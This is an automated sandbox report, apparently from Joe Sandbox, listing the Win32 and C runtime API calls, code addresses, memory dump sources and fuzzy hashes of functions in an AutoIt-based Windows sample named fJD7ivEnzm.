                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                          • String ID:
                                                                          • API String ID: 1358664141-0
                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2880819207-0
                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                          • String ID:
                                                                          • API String ID: 1187119602-0
                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1597257046-0
                                                                          • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                          • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                          • String ID:
                                                                          • API String ID: 237123855-0
                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3349847261-0
                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2223660684-0
                                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                                          • EndPath.GDI32(?), ref: 00447336
                                                                          • StrokePath.GDI32(?), ref: 00447344
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 2783949968-0
                                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                          • __freeptd.LIBCMT ref: 0041516B
                                                                          • ExitThread.KERNEL32 ref: 00415173
                                                                          Similarity
                                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1454798553-0
                                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: Q\E
                                                                          • API String ID: 909875538-2189900498
                                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 2652923123-3941886329
                                                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: U$\
                                                                          • API String ID: 2666721431-100911408
                                                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                          • String ID: LPT
                                                                          • API String ID: 3035604524-1350329615
                                                                          • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                          • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$h
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID: &
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CrackInternet_wcslen
                                                                          • String ID: |
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          APIs
                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
